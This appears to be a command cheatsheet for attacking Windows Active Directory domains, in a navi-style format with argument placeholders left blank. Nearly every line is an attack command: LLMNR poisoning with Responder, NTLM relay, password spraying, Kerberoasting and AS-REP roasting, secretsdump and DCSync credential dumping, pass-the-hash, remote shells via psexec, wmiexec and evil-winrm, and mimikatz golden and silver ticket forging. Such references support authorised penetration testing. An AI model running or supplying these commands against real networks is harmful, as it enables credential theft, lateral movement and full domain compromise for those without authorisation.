% ad, active-directory, kerberos, windows, netexec # Start Responder (LLMNR/NBT-NS poisoning) sudo responder -I -dwPv # SMB relay attack sudo ntlmrelayx.py -tf targets.txt -smb2support # Get domain users (NetExec - replacement for crackmapexec) nxc smb -u -p --users # Get domain groups nxc smb -u -p --groups # Password spray nxc smb -u users.txt -p '' --continue-on-success # Password spray multiple passwords nxc smb -u users.txt -p passwords.txt --no-bruteforce --continue-on-success # Kerberoasting - Get TGS tickets GetUserSPNs.py /: -dc-ip -request # AS-REP Roasting GetNPUsers.py / -usersfile users.txt -dc-ip -format hashcat # Dump secrets (admin required) secretsdump.py /:@ # Pass the hash psexec.py /@ -hashes : # Pass the hash with NetExec nxc smb -u -H # DCSync attack secretsdump.py /:@ -just-dc # Get shell with psexec psexec.py /:@ # Get shell with wmiexec wmiexec.py /:@ # Get shell with evil-winrm evil-winrm -i -u -p # BloodHound collection bloodhound-python -d -u -p -c all -ns # PowerView - Get domain info Import-Module .\PowerView.ps1; Get-Domain # PowerView - Get domain users Get-DomainUser | select samaccountname # PowerView - Get domain computers Get-DomainComputer | select name # PowerView - Find domain admins Get-DomainGroupMember "Domain Admins" # Golden ticket with mimikatz mimikatz.exe "kerberos::golden /User:Administrator /domain: /sid: /krbtgt: /ptt" "exit" # Silver ticket mimikatz.exe "kerberos::golden /User:Administrator /domain: /sid: /target: /service: /rc4: /ptt" "exit" $ interface: ip link show | grep -E "^[0-9]" | cut -d: -f2 | tr -d ' ' | grep -v lo $ dc_ip: echo "" $ domain: echo "" $ username: echo "" $ password: echo "" $ target: echo "" $ nthash: echo ""